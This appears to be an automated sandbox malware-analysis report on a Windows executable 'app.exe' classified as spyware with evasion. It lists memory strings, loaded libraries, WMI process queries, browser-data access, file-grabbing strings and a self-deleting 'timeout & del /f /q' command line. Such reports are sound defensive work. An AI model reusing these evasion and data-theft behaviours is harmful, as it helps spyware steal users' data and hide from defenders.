Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: app.exe, 00000003.00000003.3182859527.00000000055F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://office.com/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://office.com/setupMicrosoft
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recoveringlib.blogspot.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;9
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setupMicrosoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: app.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: app.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashaert
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/7
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/AutoIt
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=at
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=autoit
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setupMicrosoft
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:49788 version: TLS 1.2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00424B38 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

System Summary

Source: app.exeStatic PE information: section name: )m&
Source: app.exe.0.drStatic PE information: section name: )m&
Source: app.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: app.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C02D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C77D0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025902D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025977D0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02579E36 AcquireSRWLockExclusive,AcquireSRWLockExclusive,NtDeviceIoControlFile,RtlNtStatusToDosError,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040A44A: GetCurrentProcess,SetPriorityClass,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_004092DE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00404358
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040941D
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040964F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040A770
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00407703
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_004077F6
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00409A38
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00412AC0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00425B56
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00407DBE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00404E54
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00418E0E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257A020
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D91D2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025801BB
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025BE5F7
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0259AA16
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02583ABA
Source: Joe Sandbox View  Dropped File: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe E9BC44CF548A70E7285499209973FAF44B7374DECE1413DFCDC03BF25A6C599C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Code function: String function: 025BCAF0 appears 156 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Code function: String function: 02533D50 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Code function: String function: 025ADE90 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Code function: String function: 025BC9A0 appears 60 times
Source: C:\Users\user\Desktop\app.exe  Code function: String function: 00416398 appears 132 times
Source: C:\Users\user\Desktop\app.exe  Code function: String function: 025ECAF0 appears 112 times
Source: C:\Users\user\Desktop\app.exe  Code function: String function: 00416EF8 appears 50 times
Source: C:\Users\user\Desktop\app.exe  Code function: String function: 025EC9A0 appears 45 times
Source: C:\Users\user\Desktop\app.exe  Code function: String function: 02563D50 appears 73 times
Source: app.exe, 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp  Binary or memory string: OriginalFilename vs app.exe
Source: app.exe, 00000003.00000000.2681579898.000000000044D000.00000002.00000001.01000000.00000007.sdmp  Binary or memory string: OriginalFilename vs app.exe
Source: app.exe  Binary or memory string: OriginalFilename vs app.exe
Source: app.exe.0.dr  Binary or memory string: OriginalFilename vs app.exe
Source: app.exe  Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: app.exe.0.dr  Binary string: Could not open \device\physicalmemory
Source: app.exe.0.dr  Binary string: Could not map view of %X length %XCould not open \device\physicalmemory\device\physicalmemoryRtlNtStatusToDosErrorNtMapViewOfSectionNtOpenSectionNtUnmapViewOfSectionntdll.dllRtlInitUnicodeString%c
Source: classification engine  Classification label: mal100.spyw.evad.winEXE@10/6@1/2
Source: C:\Users\user\Desktop\app.exe  Code function: 0_2_025C2A50 GetModuleHandleW,FormatMessageW,GetLastError,HeapFree,
Source: C:\Users\user\Desktop\app.exe  Code function: 0_2_0040A130 GetVersionExA,CoCreateInstance,CoSetProxyBlanket,VariantInit,lstrlenW,lstrcpynA,WideCharToMultiByte,
Source: C:\Users\user\Desktop\app.exe  Code function: 0_2_00423119 EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_03
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Mutant created: \Sessions\1\BaseNamedObjects\hrzbaov
Source: C:\Users\user\Desktop\app.exe  File created: C:\Users\user\AppData\Local\Temp\7041956494665639546
Source: app.exe  Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\app.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\Desktop\app.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\app.exe  File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\app.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: app.exe, 00000003.00000003.3188734917.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.dr  Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: app.exe  Virustotal: Detection: 11%
Source: C:\Users\user\Desktop\app.exe  File read: C:\Users\user\Desktop\app.exe
Source: unknown  Process created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"
Source: C:\Users\user\Desktop\app.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\app.exe  Process created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\app.exe  Process created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\app.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: oledlg.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: amsi.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: userenv.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: profapi.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: version.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: wldp.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: propsys.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: edputil.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: netutils.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: slc.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: sppc.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\app.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe  Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\timeout.exe  Section loaded: version.dll
Source: C:\Windows\SysWOW64\timeout.exe  Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\app.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: app.exe  Static file information: File size 1290240 > 1048576
Source: Binary string: SRLPR.pdBf source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: grabg::C:\\Users\\user\\Desktop\\GQSZOBXUFX\\RMDIWSRLPR.pdBfGbodyFUk1ESVdTU source: app.exe, 00000003.00000003.3101475941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GQSZOBXUFX\\RMDIWSRLPR.pdBfIbodyHUk1ESVdTU source: app.exe, 00000003.00000003.3127769261.00000000055F6000.00000004.00000020.00020000.00000000.sdmp

